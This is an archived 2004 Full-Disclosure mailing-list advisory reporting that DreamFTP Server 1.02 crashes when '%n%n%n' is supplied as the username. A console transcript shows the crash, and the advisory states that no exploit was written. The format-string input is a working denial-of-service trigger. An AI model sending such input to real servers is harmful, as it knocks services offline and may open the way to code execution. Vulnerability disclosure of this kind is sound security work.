[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] DreamFTP Server 1.02 Buffer Overflow
- To: full-disclosure@lists.netsys.com
- Subject: [Full-Disclosure] DreamFTP Server 1.02 Buffer Overflow
- From: "badpack3t" <badpack3t@security-protocols.com>
- Date: Sat, 7 Feb 2004 00:29:54 -0500 (EST)
SP Research Labs Advisory x09
--------------------------------------------
DreamFTP 1.02 Buffer Overflow
--------------------------------------------
Vendor Home Page:
http://www.bolintech.com/
Date Released - 2.6.2004
---------------------------------------------------
Product Description from the vendor:
Dream FTP Server provides powerful, multithreaded and robust FTP server
performance with a user-friendly and easy-of-use interfaces.
--------------------
Buffer Overflow
When connecting to the ftp server and supplying %n%n%n for the username,
the ftp server crashes.
Example:
---------
C:\>ftp 192.168.1.101
Connected to 192.168.1.101.
220- ****************************************
220-
220- Welcome to Dream FTP Server
220- Copyright 2002 - 2004
220- BolinTech Inc.
220-
220- ****************************************
220-
220
User (192.168.1.101:(none)): %n%n%n
Connection closed by remote host.
**Application Crashes**
----------
Exploit:
Not worth the time to debug and code an exploit.
--------------------------------------
Tested on WindowsXP SP1
Original Advisory:
http://www.security-protocols.com/modules.php?name=News&file=article&sid=1722
peace out,
------------------------------
badpack3t
www.security-protocols.com
------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html